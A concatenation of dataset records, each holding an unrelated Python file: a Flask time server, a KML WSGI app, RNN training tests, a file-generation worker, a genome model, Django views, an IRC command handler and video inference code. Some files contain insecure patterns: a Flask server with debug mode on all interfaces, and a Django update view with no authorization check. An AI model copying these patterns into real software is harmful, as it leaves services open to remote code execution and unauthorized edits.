ax1.plot(epochArr, test_acc, label = 'Accuracy - Validation Dataset')\n ax1.set_ylabel('Accuracy (percent)')\n ax1.set_ylim(ymax = 100, ymin = 0)\n handles, labels = ax1.get_legend_handles_labels()\n ax1.legend(handles, labels)\n plt.setp(ax1.get_xticklabels(), visible=False) \n \n if show_plot: \n plt.show()\n\n if save_plot:\n plt.savefig(plot_fn, dpi = 200)\n\ndef showImage(q_gpu, p_gpu, n_gpu):\n q_cpu = q_gpu.cpu()\n p_cpu = p_gpu.cpu()\n n_cpu = n_gpu.cpu()\n\n q_arr = q_cpu.numpy().transpose().squeeze()\n p_arr = p_cpu.numpy().transpose().squeeze()\n n_arr = n_cpu.numpy().transpose().squeeze()\n \n img_arr = np.concatenate((q_arr, p_arr, n_arr), axis = 1)\n plt.imshow(img_arr)\n plt.axis('off') \n plt.show()\n\nif __name__ == \"__main__\":\n final_results(epoch_num)\n\n\n\n\n","sub_path":"hw5/src/final_results.py","file_name":"final_results.py","file_ext":"py","file_size_in_byte":9219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"81079055","text":"#!/usr/bin/env python\n\nimport datetime\nimport os\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef epoch_time():\n return str(datetime.datetime.now().timestamp())\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 6378))\n app.run(host=\"0.0.0.0\", port=port, debug=True)\n","sub_path":"time/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"128344011","text":"def application(environ, start_response):\n # set paths\n import sys, os\n sys.path.append('/var/repos/')\n os.environ['MPLCONFIGDIR'] = '/var/repos/.matplotlib'\n os.environ['GDAL_DATA'] = 'usr/share/gdal/1.9'\n\n try:\n from werkzeug.wrappers import Response, Request\n import openhydro as oh\n except Exception as e:\n out=\"Error while loading: {0}.\".format(e.message)\n response = Response(out)\n return response(environ, start_response)\n \n # change the profile to hydro_freiburg\n oh.change_profile(\"hydro_freiburg\")\n\n ### Handle the Request\n request = Request(environ)\n \n if 'icon' in request.args:\n _icon_href = request.args['icon']\n else:\n _icon_href = 'http://maps.google.com/mapfiles/kml/paddle/purple-circle.png'\n \n if 'operation' in request.args:\n _operation = request.args['operation']\n else:\n _operation = '__collection__'\n \n try:\n# lst = oh.allStations()\n lst = oh.allSensors(operation=_operation, replace={'###_cols_###':'id, name || \\'(ID: \\' || id || \\')\\' as title, proj4, location as geometry, owner as \"Besitzer\",datapoints as \"Messpunkte\", \\'von \\' || start || \\' bis \\' || \"end\" as \"Zeitraum\", min, mean, max '})\n except:\n out = \"The Sensors could not be grabbed.\"\n\n try:\n # toggle _op\n if 'link_operation' in request.args:\n _op = \"&operation={0}\".format(request.args['link_operation'])\n else:\n _op = \"\"\n out = lst.__kml__(icon_href=_icon_href, exclude_fields=['id', 'title', 'proj4', 'geometry', 'geom'], link_text=\"Zum Sensor ...\", link_href=\"http://openhydro.de/index.php/details.html?sensor=###_id_###&profile=hydro_freiburg{0}&baseurl=http://openhydro.de/index.php/details.html\".format(_op))\n except Exception as e:\n out = \"KML creation abortet on Python Error: {0}\".format(e.message) \n\n ### return routine\n response = Response(out)\n response.headers['content-type'] = 'application/vnd.google-earth.kml+xml'\n response.headers['Content-Disposition'] = 'attachment; filename=hydro_freiburg.kml'\n return response(environ, start_response)\n","sub_path":"web/hydro_freiburg.kml.py","file_name":"hydro_freiburg.kml.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"229329648","text":"# The naïve unit test for writerRNN using Hydrogen on Atom\n\n# %% Commonly used libraries and variables\nimport numpy as np\nimport os\nimport string\nfrom collections import Counter\nimport re\nfrom importlib import reload\nimport writerRNN\nimport torch.nn as nn\nimport torch\npath = writerRNN.PATH\nALL_CHARS = writerRNN.ALL_CHARS\n\n# %% utf8_to_ascii for ALL_CHARS including numbers of punctuations\nfile = '666-temp-by-foo.txt'\nwriterRNN.utf8_to_ascii(\n 'Pendant plusieurs jours de suite des lambeaux d\\'armée en déroute avaient traversé la ville.')\nwriterRNN.utf8_to_ascii(\n 'SONNET 18\\t Shall I compare thee to a summer’s day?\\nThou art more lovely and more temperate.\\n Rough winds do shake the darling buds of May,\\n And summer’s lease hath all too short a date.')\n\n# %% read from files: note the pass-by-object property of python!\nfiles = writerRNN.list_by_extension(path)\nfile = files[1]\nfile\ntext = writerRNN.read_text_from_file(file)\ntext[:50]\n\n# %% clean up text!\nsmall_text = '\\tSONNET 18\\n\\nShall I compare thee to a summers day?\\nThou art more lovely -- and more temperate.'\nsmall_1 = small_text.replace('--', ' ')\nsmall_1 # remove '--'\nsmall_2 = small_1.translate(str.maketrans({key: \" {0} \".format(\n key) for key in (string.whitespace + string.punctuation)}))\nsmall_2 # whitespace between word and non-words\nsmall_3 = small_2\n# small_3 = small_2[1:-1]\n# small_3 # remove whitespace at head & tail\nsmall_4 = re.sub(\" +\", \" \", small_3)\nsmall_4 # compress whitespaces\nsmall_5 = re.split(r'( +)', small_4)\nsmall_5 # split on whitespace\nsmall_6 = [t.casefold() for t in small_5]\nsmall_6 # make everything lowercase\nsmall_cleaned = small_6\nreload(writerRNN)\nwriterRNN.clean_text(small_text)\n\n\n# %% fetch_data testing\nraw_text = writerRNN.read_text_from_file(file, path)\nclean_text = writerRNN.clean_text(raw_text)\nvocabulary = Counter(clean_text)\nassert (len(vocabulary) <= len(clean_text))\ntext, encoder, decoder = writerRNN.fetch_data(file, path, verbose=True)\n\n# =========================================================\n# End of Phase 1 data preparation\n\n# %%\nfile_name = file\ntext, encoder, decoder\nn_vocab = len(encoder)\n\nseq_size = 32\nembedding_size = 64\nlstm_size = 64\nrnn = writerRNN.writerRNN(n_vocab, seq_size, embedding_size, lstm_size)\n\ncriterion = nn.CrossEntropyLoss()\nlr = 0.001\noptimizer = torch.optim.Adam(rnn.parameters(), lr=lr)\n\n# =========================================================\n# End of Phase 2 model declaration\n\n\n# %%\nlen(text)\nencoder\nreload(writerRNN)\nencoded_in, encoded_out = writerRNN.load_batches(\n text * 5, encoder, 4, 16, verbose=True)\nbatch_in = np.reshape(encoded_in, (16, -1))\nbatch_in.shape\nbatch_out = np.reshape(encoded_out, (16, -1))\nbatch_out.shape\n\nxx, yy = [], []\nfor i in range(0, 23 * 4, 4):\n xx.append(batch_in[:, i:i + 4])\nlen(xx)\n\nreload(writerRNN)\nxx, yy = writerRNN.load_batches(text * 5, encoder, 4, 16, verbose=True)\n\nlen(xx)\nxx[0].shape\n\nstring.whitespace\n# =================== End of data loading\n\n\n# %% Train\nbatch_size = 16\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# %%\nreload(writerRNN)\ntype(n_vocab)\ntype(embedding_size)\n\n\nwriterRNN.fit_model(rnn, device, encoder, criterion, lr, optimizer, batch_size, xx, yy,\n n_epoch=3, verbose=True, save_model=False, print_every=1, save_every=2)\n","sub_path":"rNN/writerRNN_test.py","file_name":"writerRNN_test.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"167616804","text":"#!usr/bin/env python\n\"\"\"Module for generating filtered file\"\"\"\nimport json\nfrom flask import send_file, send_from_directory, safe_join, abort\nimport requests\nfrom file_gen_service.utils.csv_generator import generate_filtered_csv_file\nfrom file_gen_service.utils.xlsx_generator import generate_filtered_xlsx_file\nfrom file_gen_service.configs.logger import LOGGER\n\n\n# def post_request_to_file_service(file_path):\n# file_url = \"http://web-file:5000/files\"\n# try:\n# file = open(file_path, 'rb')\n# files_to_load = {'user_file': file}\n# except FileNotFoundError as err:\n# LOGGER.info(err)\n# LOGGER.info(\"--------------------- CANT OPEN FIL\")\n#\n# result = requests.post(\n# url=file_url,\n# files=files_to_load\n# )\n\ndef post_request_to_sharing_service(file_path):\n sharing_url = \"http://web-sharing:5000/download\"\n try:\n file = open(file_path, 'rb')\n file_to_load = {'generated_file': file}\n except FileNotFoundError as err:\n LOGGER.error(err)\n LOGGER.error(\"----------------CANT'T OPEN FILE\")\n\n result = requests.post(\n url=sharing_url,\n files=file_to_load\n )\n\n\ndef request_to_file_service(file_id):\n \"\"\"\n The method for request to file service, to get the path to the file.\n Args:\n file_id:\n The ID of the file you want to get.\n Returns:\n file_path:\n The path to the file.\n \"\"\"\n\n result_of_request = requests.get(\n url=f'http://web-file:5000/file/{file_id}'\n )\n\n if result_of_request.status_code == 200:\n data = result_of_request.json()\n LOGGER.info('Success request to file service')\n file_path = data['path']\n return file_path\n else:\n LOGGER.error('Error request to file service')\n return None\n\n\ndef request_to_history_service(session, file_id, filter_id):\n \"\"\"\n The method for request to history service, to get the rows id of the filtered file.\n Args:\n session:\n The user session for which you want to get filtered rows.\n file_id:\n The ID of the file you want to get.\n filter_id:\n The filter ID for which you want to get the filtered rows.\n Returns:\n rows_id:\n The line numbers that were obtained after filtering the file by the user.\n \"\"\"\n\n result_of_request = requests.get(\n url=f'http://web-history:5000/history/file/{file_id}/filter/{filter_id}',\n cookies={'session': session}\n )\n if result_of_request.status_code == 200:\n data = result_of_request.json()\n LOGGER.info('Success request to history service')\n rows_id = data['rows_id']\n return rows_id\n else:\n LOGGER.error('Error request to history service')\n return None\n\n\ndef callback(ch, method, properties, body):\n \"\"\"\n A function that is called when a message is received from a queue\n and performs basic manipulations, ie requests to other services\n and a call to functions that will generate a new file.\n Args:\n ch:\n Virtual connection, inside another connection between producer and consumer.\n method:\n Method of data transmission between producer and consumer.\n properties:\n pika.spec.BasicProperties\n body:\n The message, in bytes, that is transmitted between the producer and the consumer.\n Returns:\n new_file_path:\n The path to the generated file.\n \"\"\"\n\n req = json.loads(body)\n session = req['session']\n file_id = req['file_id']\n filter_id = req['filter_id']\n\n try:\n file_path = request_to_file_service(file_id)\n rows_id = request_to_history_service(session, file_id, filter_id)\n except TypeError:\n LOGGER.error('Poor response from services...')\n return None\n\n if file_path.endswith('csv'):\n new_file_path = generate_filtered_csv_file(file_path, rows_id)\n elif file_path.endswith(('xls', 'xlsx')):\n new_file_path = generate_filtered_xlsx_file(file_path, rows_id)\n else:\n LOGGER.error('Poor file name...')\n return None\n\n post_request_to_sharing_service(new_file_path)\n #post_request_to_file_service(new_file_path)\n\n","sub_path":"file_gen_service/rabbit_folder/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"532116663","text":"from Genome.AbstractGenome import AbstractGenome\nimport random, configparser\nimport gene as G\n\nclass Linear(AbstractGenome):\n\n\tdef __init__(self):\n\t\tconfig = configparser.ConfigParser()\n\t\tconfig.read(\"config.ini\")\n\t\tself.length = int(config[(\"Genome.\"+type(self).__name__).upper()]['length'])\n\t\tself.promoter = config[(\"Genome.\"+type(self).__name__).upper()]['promoter']\n\t\tself.protSize = int(config[(\"Genome.\"+type(self).__name__).upper()]['protSize'])\n\t\tself.inhSize = int(config[(\"Genome.\"+type(self).__name__).upper()]['inhSize'])\n\t\tself.enhSize = int(config[(\"Genome.\"+type(self).__name__).upper()]['enhSize'])\n\t\tself.protSeqMult = int(config[(\"Genome.\"+type(self).__name__).upper()]['protSeqMult'])\n\t\tself.geneLength = self.inhSize + self.enhSize + (self.protSize * self.protSeqMult) + len(self.promoter)\n\t\tself.DNA = []\n\t\tself.genes = []\n\t\tself.fitness = 0\n\n\t# This is to automatically generate the config file for this class\n\t@staticmethod\n\tdef gConfig():\n\t\tconf = {\n\t\t\t\"length\" : 5000,\n\t\t\t\"promoter\" : \"01010101\", \n\t\t\t\"enhSize\" : 32,\n\t\t\t\"inhSize\" : 32,\n\t\t\t\"protSize\" : 32,\n\t\t\t\"protSeqMult\" : 5\n\t\t}\n\t\treturn conf\n\t\n\t# Initializes the genome and finds the genes\n\tdef initialize(self, requirements): \n\t\tinputCount = requirements['inputs']\n\t\toutputCount = requirements['outputs']\n\t\tself.DNA = [random.randint(0,1) for b in range(1,self.length+1)]\n\t\tself.findGenes()\n\t\t# for all the inputs add an input gene. Inputs regulate but don't get regulated. We want all the inputs to have the same impact and for the concentrations to play the main role. We don't care about the promoter, enhancer or inhibitor regions. So, the only thing we want is the same protein sequence for the inputs which means that they effect eachother as low as possible and effect the other genes equally as much. \n\t\t\n\t\tfor i in range(inputCount):\n\t\t\tself.genes.append(G.Gene(\"11111111\", [0 for b in range(self.enhSize)], [0 for b in range(self.inhSize)], [0 for b in range(self.protSize)], \"I\"))\n\t\t# for all the outputs add an output gene. Outputs don't regulate but get regulated. We want all the genes to have different impacts on the outputs. So, we want them to be as different as possible. \n\t\tfor i in range(outputCount):\n\t\t\tpattern = []\n\t\t\tcomp_pattern = []\n\t\t\tfor j in range(self.enhSize):\n\t\t\t\tif j >= i * (self.protSize/outputCount) and j < (i+1) * (self.protSize/outputCount):\n\t\t\t\t\tpattern.append(1)\n\t\t\t\t\tcomp_pattern.append(0)\n\t\t\t\telse:\n\t\t\t\t\tpattern.append(0)\n\t\t\t\t\tcomp_pattern.append(1)\n\t\t\tself.genes.append(G.Gene(\"00000000\", pattern, comp_pattern, [0 for b in range(self.protSize)], \"O\"))\n\t\tself.resetConcentrations()\n\t\t# for gene in self.genes:\n\t\t# \tgene.print()\n\t\tpass\n\n\tdef reinitialize(self, requirements):\n\t\tinputCount = requirements['inputs']\n\t\toutputCount = requirements['outputs']\n\t\tself.genes = []\n\t\tself.findGenes()\n\t\t# for all the inputs add an input gene. Inputs regulate but don't get regulated. We want all the inputs to have the same impact and for the concentrations to play the main role. We don't care about the promoter, enhancer or inhibitor regions. So, the only thing we want is the same protein sequence for the inputs which means that they effect eachother as low as possible and effect the other genes equally as much. \n\t\t\n\t\tfor i in range(inputCount):\n\t\t\tself.genes.append(G.Gene(\"11111111\", [0 for b in range(self.enhSize)], [0 for b in range(self.inhSize)], [0 for b in range(self.protSize)], \"I\"))\n\t\t# for all the outputs add an output gene. Outputs don't regulate but get regulated. We want all the genes to have different impacts on the outputs. So, we want them to be as different as possible. \n\t\tfor i in range(outputCount):\n\t\t\tpattern = []\n\t\t\tcomp_pattern = []\n\t\t\tfor j in range(self.enhSize):\n\t\t\t\tif j >= i * (self.protSize/outputCount) and j < (i+1) * (self.protSize/outputCount):\n\t\t\t\t\tpattern.append(1)\n\t\t\t\t\tcomp_pattern.append(0)\n\t\t\t\telse:\n\t\t\t\t\tpattern.append(0)\n\t\t\t\t\tcomp_pattern.append(1)\n\t\t\tself.genes.append(G.Gene(\"00000000\", pattern, comp_pattern, [0 for b in range(self.protSize)], \"O\"))\n\t\tself.resetConcentrations()\n\n\n\t# Finds genes in a DNA. Format: [Promoter -> Enhancer -> Inhibitor -> n * protSize]\n\tdef findGenes(self):\n\t\tself.genes = []\n\t\tfor i in range(len(self.DNA)-len(self.promoter)-self.protSize*self.protSeqMult-self.enhSize-self.inhSize-1): #here\n\t\t\tif ''.join(str(e) for e in self.DNA[i:i+len(self.promoter)]) == self.promoter:\n\t\t\t\tenhancer = self.DNA[i+len(self.promoter)+1:i+len(self.promoter)+1+self.enhSize]\n\t\t\t\tinhibitor = self.DNA[i+len(self.promoter)+1+self.enhSize:i+len(self.promoter)+1+self.enhSize+self.inhSize]\n\t\t\t\ti += len(self.promoter) + self.enhSize + self.inhSize\n\t\t\t\t# here. gotta use the majority rule to come up with the protein sequence\n\t\t\t\tprotein = []\n\t\t\t\tfor j in range(self.protSize):\n\t\t\t\t\tones = 0\n\t\t\t\t\tzeroes = 0\n\t\t\t\t\tfor k in range(self.protSeqMult):\n\t\t\t\t\t\tif self.DNA[i + j + k * self.protSize] == 0: \n\t\t\t\t\t\t\tones += 1\n\t\t\t\t\t\telse: \n\t\t\t\t\t\t\tzeroes += 1 \n\t\t\t\t\tif ones >= zeroes: # favors 1s over 0s\n\t\t\t\t\t\tprotein.append(1)\n\t\t\t\t\telse: \n\t\t\t\t\t\tprotein.append(0)\t\n\t\t\t\t# print (\"enhancer: {} inhibitor: {} protein: {}\".format(enhancer, inhibitor, protein))\n\t\t\t\ti += (self.protSeqMult * self.protSize)\n\t\t\t\tself.genes.append(G.Gene(self.promoter, enhancer, inhibitor, protein, \"TF\"))\n\n\t# Returns the genes\n\tdef getGenes(self):\n\t\treturn self.genes\n\n\tdef setFitness(self, fitness):\n\t\tself.Fitness = fitness \n\n\tdef getFitness(self):\n\t\treturn self.fitness\n\n\tdef addInputGenes():\n\t\tpass\n\n\tdef addOutputGenes():\n\t\tpass\n\n\tdef getDNA(self):\n\t\treturn self.DNA\n\t\t\n\tdef addGene(self):\n\t\tself.DNA += [random.randint(0,1) for b in range(self.geneLength)]\n\n\tdef resetConcentrations(self):\n\t\tfor gene in self.genes:\n\t\t\tgene.concentration = 1 / len(self.genes)\n\n","sub_path":"Genome/Linear.py","file_name":"Linear.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"91656064","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render,get_object_or_404, redirect, Http404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib import messages\nfrom .models import MainContent\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\n\nfrom django.http import *\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom .forms import MainContentForm\n\n\n\ndef main_create(request):\n \n if request.user.is_staff or request.user.is_superuser:\n form = MainContentForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n return HttpResponseRedirect(\"/\")\n else:\n \tpass\n \n\n\n context = {\n \"form\" : form,\n }\n return render(request, \"post_form.html\", context)\n else:\n raise Http404\n\ndef main_view(request, id=None):\n\n\n instance = get_object_or_404(MainContent, id=1 )\n\n\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"img\" : instance.image\n\n\n }\n return render(request, \"main_page.html\", context)\ndef page_view(request, id=None):\n\n\n instance = get_object_or_404(MainContent, id=3 )\n\n\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"img\" : instance.image\n\n\n }\n return render(request, \"elerhetosegek.html\", context)\n\ndef main_update(request, id=None):\n \n\n instance = get_object_or_404(MainContent, id=id)\n form = MainContentForm(request.POST or None,request.FILES or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n # messages.success(request, \"Sikeresen frissítve..\")\n\n return HttpResponseRedirect('/')\n else:\n # messages.error(request,\"Sikertelen frissítés... :(\")\n print(\"Sikertelen létrhozas!\")\n \n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"form\" : form\n\n }\n \n\n return render(request, \"post_form.html\", context)\n\n\ndef main_delete(request, slug=None):\n if request.user.is_staff or request.user.is_superuser:\n\n instance = get_object_or_404(Post, slug=slug )\n instance.delete()\n messages.success(request,\"Deleted!\")\n return redirect(\"posts:list\")\n else:\n raise Http404\n\n","sub_path":"MainContent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275192144","text":"from django import forms\n\nfrom .models import Post\n\n\nclass PostModelForm(forms.ModelForm):\n tags = forms.CharField(label='tag', required=False)\n\n class Meta:\n model = Post\n fields = [\"title\", \"image\"]\n\n def clean_title(self):\n title = self.cleaned_data.get(\"title\")\n if len(title) <= 3:\n raise forms.ValidationError(\n \"Length has to be more than 3 character\"\n )\n return title\n","sub_path":"posts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"414667695","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\aioyoyo\\cmdhandler.py\n# Compiled at: 2017-03-02 21:01:17\n# Size of source mod 2**32: 7190 bytes\nimport inspect, logging, traceback\nfrom .oyoyo.parse import parse_nick\nfrom .oyoyo.cmdhandler import CommandError, NoSuchCommandError, ProtectedCommandError, IRCClientError\nfrom . import helpers\n\ndef protected(func):\n \"\"\"Decorator to protect functions from being called as commands\"\"\"\n func.protected = True\n return func\n\n\nclass CommandHandler(object):\n __doc__ = ' The most basic CommandHandler '\n\n def __init__(self, client):\n self.client = client\n\n @protected\n def get(self, in_command_parts):\n \"\"\"Finds a command\n commands may be dotted. each command part is checked that it does\n not start with and underscore and does not have an attribute\n \"protected\". if either of these is true, ProtectedCommandError\n is raised.\n its possible to pass both \"command.sub.func\" and\n [\"command\", \"sub\", \"func\"].\n \"\"\"\n if isinstance(in_command_parts, bytes):\n in_command_parts = in_command_parts.split('.'.encode())\n else:\n if isinstance(in_command_parts, str):\n in_command_parts = in_command_parts.split('.')\n command_parts = in_command_parts[:]\n p = self\n while command_parts:\n cmd = command_parts.pop(0)\n if type(cmd) is bytes:\n cmd = cmd.decode()\n if cmd.startswith('_'):\n raise ProtectedCommandError(in_command_parts)\n try:\n f = getattr(p, cmd)\n except AttributeError:\n raise NoSuchCommandError(in_command_parts)\n\n if hasattr(f, 'protected'):\n raise ProtectedCommandError(in_command_parts)\n if isinstance(f, CommandHandler):\n if command_parts:\n return f.get(command_parts)\n p = f\n\n return f\n\n @protected\n async def run(self, command, *args):\n \"\"\"Finds and runs a command\"\"\"\n logging.debug('processCommand %s(%s)' % (command, args))\n logging.info('processCommand %s(%s)' % (command, args))\n try:\n f = self.get(command)\n except NoSuchCommandError:\n (self.__unhandled__)(command, *args)\n return\n else:\n logging.debug('f %s' % f)\n try:\n await f(self.client, *args)\n except Exception as e:\n logging.error('command raised %s' % e)\n logging.error(traceback.format_exc())\n raise CommandError(command)\n\n @protected\n def __unhandled__(self, cmd, *args):\n \"\"\"The default handler for commands. Override this method to\n apply custom behavior (example, printing) unhandled commands.\n \"\"\"\n logging.debug('unhandled command %s(%s)' % (cmd, args))\n\n\nclass DefaultCommandHandler(CommandHandler):\n __doc__ = ' CommandHandler that provides methods for the normal operation of IRC.\\n If you want your bot to properly respond to pings, etc, you should subclass this.\\n '\n\n async def ping(self, prefix, server):\n \"\"\"Called on PING command, sends back PONG\"\"\"\n self.client.send('PONG', server)\n\n\nclass DefaultBotCommandHandler(CommandHandler):\n __doc__ = 'Default command handler for bots. Methods/Attributes are made\\n available as commands '\n\n @protected\n def getVisibleCommands(self, obj=None):\n \"\"\"Gets all visible commands, protected\"\"\"\n test = lambda x: isinstance(x, CommandHandler) or inspect.ismethod(x) or inspect.isfunction(x)\n members = inspect.getmembers(obj or self, test)\n return [m for m, _ in members if not m.startswith('_') if not hasattr(getattr(obj, m), 'protected')]\n\n async def help(self, sender, dest, arg=None):\n \"\"\"List all available commands or get help on a specific command\"\"\"\n logging.info('help sender=%s dest=%s arg=%s' % (sender, dest, arg))\n if not arg:\n commands = self.getVisibleCommands()\n commands.sort()\n await helpers.msg(self.client, dest, 'available commands: %s' % ' '.join(commands))\n else:\n try:\n f = self.get(arg)\n except CommandError as e:\n await helpers.msg(self.client, dest, str(e))\n return\n\n doc = f.__doc__.strip() if f.__doc__ else 'No help available'\n if not inspect.ismethod(f):\n subcommands = self.getVisibleCommands(f)\n if subcommands:\n doc += ' [sub commands: %s]' % ' '.join(subcommands)\n await helpers.msg(self.client, dest, '%s: %s' % (arg, doc))\n\n\nclass BotCommandHandler(DefaultCommandHandler):\n __doc__ = 'Complete command handler for bots'\n\n def __init__(self, client, command_handler):\n DefaultCommandHandler.__init__(self, client)\n self.command_handler = command_handler\n\n async def privmsg(self, prefix, dest, msg):\n \"\"\"Called when privmsg command is received, just awaits\n BotCommandHandler.tryBotCommand with the same args\"\"\"\n await self.tryBotCommand(prefix, dest, msg)\n\n @protected\n async def tryBotCommand(self, prefix, dest, msg):\n \"\"\"Tests a command to see if its a command for the bot, returns True\n and calls self.processBotCommand(cmd, sender) if its is.\n \"\"\"\n logging.debug(\"tryBotCommand('%s' '%s' '%s')\" % (prefix, dest, msg))\n if dest == self.client.nick:\n dest = parse_nick(prefix)[0]\n else:\n if msg.startswith(self.client.nick):\n msg = msg[len(self.client.nick) + 1:]\n else:\n return False\n msg = msg.strip()\n parts = msg.split(' ', 1)\n command = parts[0]\n arg = parts[1:]\n try:\n await (self.command_handler.run)(command, prefix, dest, *arg)\n except CommandError as e:\n await helpers.msg(self.client, dest, str(e))\n\n return True","sub_path":"pycfiles/aioyoyo-1.2.2-py3.6/cmdhandler.cpython-36.py","file_name":"cmdhandler.cpython-36.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148898696","text":"\nimport urllib\nimport urllib2\nimport zope.app.appsetup.product\nimport zope.interface\nimport zope.component\nimport zeit.content.quiz.interfaces\n\n\nclass Updater(object):\n\n zope.component.adapts(zeit.content.quiz.interfaces.IQuiz)\n zope.interface.implements(zeit.content.quiz.interfaces.IQuizUpdater)\n\n def __init__(self, context):\n self.context = context\n\n def update(self):\n url = self.get_url()\n if url:\n urllib2.urlopen(url, self.get_data())\n\n def get_url(self):\n config = zope.app.appsetup.product.getProductConfiguration(\n 'zeit.content.quiz')\n if config:\n return config.get('url')\n\n def get_data(self):\n data = dict(\n quiz_id=self.context.uniqueId.replace('http://xml.zeit.de', '', 1),\n action='preview',\n xml=zeit.cms.content.interfaces.IXMLSource(self.context))\n return urllib.urlencode(sorted(data.items()))\n\n\n@zope.component.adapter(\n zeit.content.quiz.interfaces.IQuiz,\n zeit.cms.checkout.interfaces.IAfterCheckinEvent)\ndef update_after_checkin(context, event):\n updater = zeit.content.quiz.interfaces.IQuizUpdater(context)\n updater.update()\n","sub_path":"src/zeit/content/quiz/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"564796033","text":"\n\nfrom .att_models import *\nfrom .reader import readShortVideo\nfrom .reader import getVideoList\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom os import listdir\nimport sys\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\n\nimport torchvision\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nimport skimage.io\nimport skimage\nimport pickle\n\ndef norm(image):\n\n transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Pad((0,40), fill=0, padding_mode='constant'),\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n return transform(image)\n\ndef main():\n arg = sys.argv\n\n video_path = arg[1]\n out_file = arg[2]\n\n model = Resnet50(pretrained=False).cuda()\n model.load_state_dict(torch.load(os.path.join(\n \"p3/att_final\", \"encode_model.pth\")))\n model.eval()\n classifier = Classifier().cuda()\n classifier.load_state_dict(torch.load(os.path.join(\n #\"p3/final\", \"model_0.574513.pkt\")))\n #\"p3/final\", \"model_0.579884.pkt\")))\n \"p3/att_final\", \"model_0.605840.pkt\")))\n classifier.eval()\n\n # out_file = \"./output\"\n # video_path = \"hw4_data/FullLengthVideos/videos/valid/\"\n # label_path = \"hw4_data/FullLengthVideos/labels/valid/\"\n\n category_list = sorted(os.listdir(video_path))\n\n valid_video_feature = []\n for category in category_list:\n print(\"Category: \", category)\n out_txt = os.path.join(out_file, category+\".txt\")\n category_frames = []\n frame_output = []\n img_file_list = sorted(os.listdir(os.path.join(video_path, category)))\n valid_lengths = len(img_file_list)\n\n for img in img_file_list:\n image_rgb = skimage.io.imread(os.path.join(video_path, category,img))\n image_nor = norm(image_rgb).view((1,3,224,224)).cuda()\n feature = model(image_nor).data.view(2048).unsqueeze(0)\n \n category_frames.append(feature)\n \n category_frames = torch.cat(category_frames, dim=0)\n category_frames = category_frames.unsqueeze(0)\n \n pred = classifier(category_frames, [category_frames.size(1)])\n\n prediction = torch.argmax(torch.squeeze(pred.cpu()),1).data.numpy()\n\n # print(prediction.shape)\n\n for i in range(len(prediction)):\n if i == 0:\n continue\n elif i > 0 and i<(len(prediction)-1):\n if prediction[i-1] == prediction[i+1]:\n prediction[i] = prediction[i-1]\n \n # exit()\n\n with open(os.path.join(out_txt), \"w+\") as f:\n for p in prediction:\n f.write(str(p)+'\\n')\n\nif __name__ == '__main__':\n #print(config)\n main()","sub_path":"p3/att_inference.py","file_name":"att_inference.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"489479542","text":"from cloudrail.knowledge.context.gcp.gcp_environment_context import GcpEnvironmentContext\nfrom cloudrail.knowledge.context.gcp.resources.binary_authorization.gcp_binary_authorization_policy import GcpBinaryAuthorizationAdmissionRule, \\\n GcpBinaryAuthorizationAdmissionRuleType, GcpBinaryAuthorizationAdmissionEvaluationMode, GcpBinaryAuthorizationAdmissionEnforcementMode\n\nfrom tests.knowledge.context.gcp_context_test import GcpContextTest\nfrom tests.knowledge.context.test_context_annotation import context\n\n\nclass TestBinaryAuthorizationPolicy(GcpContextTest):\n def get_component(self):\n return 'binary_authorization_policy'\n\n 